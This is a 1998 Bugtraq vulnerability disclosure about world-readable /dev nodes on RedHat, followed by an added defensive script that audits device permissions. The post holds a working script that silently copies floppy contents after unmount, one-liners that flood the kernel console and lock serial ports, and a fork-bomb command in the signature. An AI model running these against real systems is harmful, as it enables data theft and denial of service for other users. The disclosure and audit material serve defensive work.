Bugtraq mailing list archives
RedHat 4.x/5.0 /dev permissions
From: lcamtuf () POLBOX COM (Michał Zalewski)
Date: Wed, 4 Feb 1998 09:45:37 +0100
First one
----------

Any user can read data from an (even unmounted) floppy using "cat /dev/fd0H1440". It isn't dangerous in itself, but... Any user may write a script which periodically checks whether the floppy has just been unmounted, then dumps its content to a file. Here's a sample 'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
  sleep 1
  # An empty result means the floppy is not (or no longer) mounted
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    # Dump only once per unmount
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --

Also, if there's no floppy in the drive, an unprivileged user may flood the kernel log console (local console by default!!!):

[user@host sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged to /var/log/messages AND to the console (default klogd behaviour). Also, every printk(...) (called by the fd driver) uses sync() to flush buffers. It will cause abnormal hdd activity.

Second one
-----------

(not tested with rh 5.0)

Ordinary users are allowed to read /dev/ttyS*. The serial port driver disallows multiple access attempts at the same time, so a user may permanently lock a chosen port using this command:

[user@host user]$ cat /dev/ttyS0
(Ctrl+Z)
[user@host user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now the serial port is in an unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, e.g. /dev/sequencer, which are world-readable or even world-writable. There isn't ANY reason to give ordinary users direct access to hardware devices. It's quite easy (as shown above ;) to obtain interesting data or cause system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
To iterate is human, to execute recursively is divine [P. Deutsch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
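
Added example, not part of the original post: a more systematic form of the "ls -l /dev/* | grep" check, which flags block and character device nodes that "other" can read or write. The allow-list, the function names and the sample listing are assumptions constructed for illustration; audit_live assumes GNU find and stat.

```shell
#!/bin/sh
# Audit device nodes for world read/write access (added example).
# Input on stdin: one "<symbolic mode> <path>" pair per line, e.g. "crw-r--r-- /dev/ttyS0".

# Devices intended to be usable by everyone (assumed allow-list; adjust per site).
ALLOW="/dev/null /dev/zero /dev/full /dev/tty /dev/random /dev/urandom /dev/ptmx"

audit_dev_modes() {
    while read -r mode path; do
        case "$mode" in
            [bc]*) ;;              # only block and character device nodes
            *) continue ;;
        esac
        case " $ALLOW " in
            *" $path "*) continue ;;   # deliberately world-accessible
        esac
        # Characters 8-9 of the mode string are the "other" read and write bits.
        other=$(printf '%s' "$mode" | cut -c8-9)
        case "$other" in
            rw) echo "WORLD-RW $path" ;;
            r-) echo "WORLD-R $path" ;;
            -w) echo "WORLD-W $path" ;;
        esac
    done
}

# Run the audit against a live tree (GNU find/stat assumed).
audit_live() {
    find "${1:-/dev}" \( -type b -o -type c \) -exec stat -c '%A %n' {} + | audit_dev_modes
}

# Constructed sample listing, not taken from a real system.
SAMPLE='brw-rw-r-- /dev/fd0H1440
brw-rw---- /dev/fd0
crw-r--r-- /dev/ttyS0
crw-rw-rw- /dev/sequencer
crw-rw-rw- /dev/null
crw------- /dev/console
-rw-r--r-- /dev/MAKEDEV'

# Each flagged path is a candidate for "chmod o-rw" plus group-based access.
printf '%s\n' "$SAMPLE" | audit_dev_modes
```

Run audit_live with no argument to check /dev on the local machine; review each flagged node before changing its mode, since some software expects specific devices to be accessible.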